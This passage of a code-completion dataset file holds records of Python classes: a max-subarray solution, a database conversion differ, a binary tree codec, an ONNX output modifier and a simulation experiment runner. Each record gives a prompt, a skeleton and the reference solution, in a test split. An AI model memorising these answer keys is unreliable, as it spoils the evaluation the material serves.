max(nums)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000099", "length_bytes": 1389, "license_type": "no_license", "methods": [{"docstring": "The sublist with the maximum sum :type nums: List[int] :rtype: int", "name": "maxSubArray", "signature": "def maxSubArray(self, nums)"}, {"docstring": "The sublist with the maximum sum :type nums: List[int] :rtype: int", "name": "maxSubArray2", "signature": "def maxSubArray2(self, nums)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002828", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSubArray(self, nums): The sublist with the maximum sum :type nums: List[int] :rtype: int\n- def maxSubArray2(self, nums): The sublist with the maximum sum :type nums: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxSubArray(self, nums): The sublist with the maximum sum :type nums: List[int] :rtype: int\n- def maxSubArray2(self, nums): The sublist with the maximum sum :type nums: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxSubArray(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxSubArray2(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n<|end_body_0|>\n\n<|body_start_1|>\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n<|end_body_1|>\n", "revision_id": "04d87d76b762f6ea7cfb3a453382b2d7d4e154dc", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxSubArray(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxSubArray2(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxSubArray(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n sum = nums[0]\n max_sum = nums[0]\n for i in range(1, len(nums)):\n if sum < 0:\n sum = 0\n sum += nums[i]\n max_sum = max(sum, max_sum)\n return max_sum\n\n def maxSubArray2(self, nums):\n \"\"\"The sublist with the maximum sum :type nums: List[int] :rtype: int\"\"\"\n for i in range(1, len(nums)):\n if nums[i - 1] > 0:\n nums[i] += nums[i - 1]\n return max(nums)\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode/053 Maximum Subarray.py", "source_repo": "mofei952/algorithm_exercise", "split": "test", "star_events_count": 1} {"blob_id": "4373af4f7269b4351061ede4540076573c8b5d58", "bodies": ["for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv", "stmts = []\nfor cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = 
(\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\nfor sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\nreturn stmts"], "bodies_text": "<|body_start_0|>\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n<|end_body_0|>\n\n<|body_start_1|>\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n<|end_body_1|>\n", "class_docstring": "The collection of conversions in a database.", "class_name": "ConversionDict", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n <|body_0|>\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n<|end_body_0|>\n\n<|body_start_1|>\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000100", "length_bytes": 4035, "license_type": "permissive", "methods": [{"docstring": "Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions", 
"name": "from_map", "signature": "def from_map(self, schema, inmap)"}, {"docstring": "Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.", "name": "diff_map", "signature": "def diff_map(self, inconvs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000032", "prompt": "Implement the Python class `ConversionDict` described below.\n\nClass description:\nThe collection of conversions in a database.\n\nMethod signatures and docstrings:\n- def from_map(self, schema, inmap): Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions\n- def diff_map(self, inconvs): Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.", "prompted_full_text": "Implement the Python class `ConversionDict` described below.\n\nClass description:\nThe collection of conversions in a database.\n\nMethod signatures and docstrings:\n- def from_map(self, schema, inmap): Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions\n- def diff_map(self, inconvs): Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\n\n<|skeleton|>\nclass ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n <|body_0|>\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n<|end_body_0|>\n\n<|body_start_1|>\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for 
conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n<|end_body_1|>\n", "revision_id": "0133f3bc522890e0564d27de6791824acb4d2773", "skeleton": "<|skeleton|>\nclass ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n <|body_0|>\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ConversionDict:\n \"\"\"The collection of conversions in a database.\"\"\"\n\n def from_map(self, schema, inmap):\n \"\"\"Initialize the dictionary of conversions by examining the input map :param schema: the schema owning the conversions :param inmap: the input YAML map defining the conversions\"\"\"\n for key in inmap:\n if not key.startswith('conversion '):\n raise KeyError('Unrecognized object type: %s' % key)\n cnv = key[11:]\n inconv = inmap[key]\n conv = Conversion(schema=schema.name, name=cnv, **inconv)\n if inconv:\n if 'oldname' in inconv:\n conv.oldname = inconv['oldname']\n del inconv['oldname']\n if 'description' in inconv:\n conv.description = inconv['description']\n self[schema.name, cnv] = conv\n\n def diff_map(self, inconvs):\n \"\"\"Generate SQL to transform existing conversions :param inconvs: a YAML map defining the new conversions :return: list of SQL statements Compares the existing conversion definitions, as fetched from the catalogs, to the input map and generates SQL statements to create, drop or change the conversions accordingly.\"\"\"\n stmts = []\n for cnv in inconvs:\n inconv = inconvs[cnv]\n if cnv in self:\n stmts.append(self[cnv].diff_map(inconv))\n elif hasattr(inconv, 'oldname'):\n oldname = inconv.oldname\n try:\n stmts.append(self[oldname].rename(inconv.name))\n del self[oldname]\n except KeyError as exc:\n exc.args = (\"Previous name '%s' for conversion '%s' not found\" % (oldname, inconv.name),)\n raise\n else:\n stmts.append(inconv.create())\n for sch, cnv in self:\n if (sch, cnv) not in inconvs:\n stmts.append(self[sch, cnv].drop())\n return stmts\n", "source": "the_stack_v2_python_sparse", "source_path": "pyrseas/dbobject/conversion.py", "source_repo": "vayerx/Pyrseas", "split": "test", "star_events_count": 1} {"blob_id": "aaa9dcdb4bce2e61a58e426639a168bd91edddef", "bodies": ["if not root:\n return ''\nqueue = deque()\nqueue.append(root)\nres = ''\nwhile len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\nreturn res", "if data == '':\n return None\nqueue = deque()\nvalues = data.split()\nroot = TreeNode(int(values[0]))\nqueue.append(root)\ni = 1\nwhile i < len(values):\n parent = queue.popleft()\n if 
values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\nreturn root"], "bodies_text": "<|body_start_0|>\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000101", "length_bytes": 1455, "license_type": "permissive", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n<|end_body_1|>\n", "revision_id": "90b6287b742c8bfd3797540c408d679be2821a40", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n if not root:\n return ''\n queue = deque()\n queue.append(root)\n res = ''\n while len(queue):\n node = queue.popleft()\n if not node:\n res += 'n '\n continue\n res += str(node.val) + ' '\n queue.append(node.left)\n queue.append(node.right)\n return res\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
:type data: str :rtype: TreeNode\"\"\"\n if data == '':\n return None\n queue = deque()\n values = data.split()\n root = TreeNode(int(values[0]))\n queue.append(root)\n i = 1\n while i < len(values):\n parent = queue.popleft()\n if values[i] != 'n':\n left = TreeNode(int(values[i]))\n parent.left = left\n queue.append(left)\n i += 1\n if values[i] != 'n':\n right = TreeNode(int(values[i]))\n parent.right = right\n queue.append(right)\n i += 1\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCodeSolutions/python/297_Serialize_and_Deserialize_Binary_Tree.py", "source_repo": "ChuanleiGuo/AlgorithmsPlayground", "split": "test", "star_events_count": 1} {"blob_id": "e87a8683d4300f34018575e8d42abaf0fb780b5c", "bodies": ["super().__init__(model, copy)\nself.outputs = outputs\nself.exclude_outputs = exclude_outputs", "model = self.load()\nif self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\nelif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\nif self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\nreturn model"], "bodies_text": "<|body_start_0|>\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n<|end_body_0|>\n\n<|body_start_1|>\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n<|end_body_1|>\n", "class_docstring": "Functor that modifies the outputs of an ONNX model.", "class_name": "ModifyOutputs", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "MIT", "ISC", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. 
Defaults to False.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n<|end_body_0|>\n\n<|body_start_1|>\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000102", "length_bytes": 37448, "license_type": "permissive", "methods": [{"docstring": "Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.", "name": "__init__", "signature": "def __init__(self, model, outputs=None, exclude_outputs=None, copy=None)"}, {"docstring": "Returns: onnx.ModelProto: The ONNX model with modified outputs.", "name": "call_impl", "signature": "def call_impl(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ModifyOutputs` described below.\n\nClass description:\nFunctor that modifies the outputs of an ONNX model.\n\nMethod signatures and docstrings:\n- def __init__(self, model, outputs=None, exclude_outputs=None, copy=None): Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model with modified outputs.", "prompted_full_text": "Implement the Python class `ModifyOutputs` described below.\n\nClass description:\nFunctor that modifies the outputs of an ONNX model.\n\nMethod signatures and docstrings:\n- def __init__(self, model, outputs=None, exclude_outputs=None, copy=None): Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. 
Defaults to False.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model with modified outputs.\n\n<|skeleton|>\nclass ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n<|end_body_0|>\n\n<|body_start_1|>\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n<|end_body_1|>\n", "revision_id": "a167852705d74bcc619d8fad0af4b9e4d84472fc", "skeleton": "<|skeleton|>\nclass ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. Defaults to False.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ModifyOutputs:\n \"\"\"Functor that modifies the outputs of an ONNX model.\"\"\"\n\n def __init__(self, model, outputs=None, exclude_outputs=None, copy=None):\n \"\"\"Modifies outputs of an ONNX model. Args: model (Union[onnx.ModelProto, Callable() -> onnx.ModelProto]): An ONNX model or a callable that returns one. outputs (Sequence[str]): Names of tensors to mark as outputs. If provided, this will override the existing model outputs. If a value of `constants.MARK_ALL` is used instead of a list, all tensors in the network are marked. exclude_outputs (Sequence[str]): Names of tensors to exclude as outputs. This can be useful in conjunction with ``outputs=constants.MARK_ALL`` to omit outputs. copy (bool): Whether to create a copy of the model first. 
Defaults to False.\"\"\"\n super().__init__(model, copy)\n self.outputs = outputs\n self.exclude_outputs = exclude_outputs\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model with modified outputs.\"\"\"\n model = self.load()\n if self.outputs == constants.MARK_ALL:\n G_LOGGER.verbose('Marking all ONNX tensors as outputs')\n model = onnx_util.mark_layerwise(model)\n elif self.outputs is not None:\n model = onnx_util.mark_outputs(model, self.outputs)\n if self.exclude_outputs is not None:\n model = onnx_util.unmark_outputs(model, self.exclude_outputs)\n return model\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/Polygraphy/polygraphy/backend/onnx/loader.py", "source_repo": "NVIDIA/TensorRT", "split": "test", "star_events_count": 8026} {"blob_id": "5b338ec865bcedb5f8523d2d62aff3d41011076f", "bodies": ["self.args = args\nself.num_iterations = args.num_iterations\nself.csv_reporter = CSVReporter(args)", "for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\nself.csv_reporter.close()"], "bodies_text": "<|body_start_0|>\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n<|end_body_0|>\n\n<|body_start_1|>\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n<|end_body_1|>\n", "class_docstring": "Class representing an experiment, consisting of multiple simulation runs.", "class_name": "Experiment", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n<|end_body_0|>\n\n<|body_start_1|>\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000103", "length_bytes": 894, "license_type": "permissive", "methods": [{"docstring": "Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.", "name": "__init__", "signature": "def __init__(self, args)"}, {"docstring": "Runs the experiment.", "name": "run", "signature": "def run(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002009", "prompt": "Implement the Python class `Experiment` described below.\n\nClass description:\nClass representing an experiment, consisting of multiple simulation runs.\n\nMethod signatures and docstrings:\n- def __init__(self, args): Constructs an instance of this class. 
